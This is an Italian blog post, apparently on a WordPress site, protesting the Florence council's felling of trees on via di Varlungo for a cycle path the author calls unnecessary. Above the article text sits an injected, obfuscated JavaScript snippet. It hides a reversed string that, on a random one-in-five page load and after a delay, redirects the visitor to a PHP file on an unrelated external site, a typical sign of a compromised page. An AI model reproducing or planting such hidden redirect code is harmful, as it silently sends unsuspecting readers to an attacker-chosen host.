Motosega facile in via di Varlungo, per una pista che non serve

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/04/taglio.jpg”>taglioA chi serve una pista ciclabile in via di Varlungo? La domanda sorge spontanea, soprattutto vedendo che per realizzarla il Comune di Firenze ha dato mandato di abbattere un bel filare di alberi giovani e frondosi, dove in questo periodo cinguettano e nidificano numerosi uccelli.

Ci sono state proteste dei cittadini e richieste di sospensione da parte della lista perUnaltracittà, ma tutto ciò che si è ottenuto è, sembra, il salvataggio di due alberi dove sono stati riscontrati dei nidi. Per gli altri, morte sicura: ieri le motoseghe hanno già iniziato il massacro, per motivi che rimangono davvero oscuri. Non c’era bisogno di una pista ciclabile, la strada è senza sfondo e non c’è traffico. Non c’erano alberi pericolanti, né vecchi, né brutti.

E allora? Secondo il comunicato di perUnaltracittà, la “politica della motosega sembra favorire soltanto le imprese del legname e i vivai”. In effetti è già pronto il progetto del reimpianto, e con questo di solito si vuol mettere fine alle proteste, come se un albero fosse una panchina, un lampione, un palo di cemento, e non un essere vivente che merita rispetto e cura.

Ma un pioppo già grande non è uguale ad un alberello di vivaio, né per i volatili né per gli umani, e non è così ovvio far fuori dei pini centenari solo perché danno fastidio al traffico. Sarebbe questa la politica ambientale del Comune di Firenze?

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *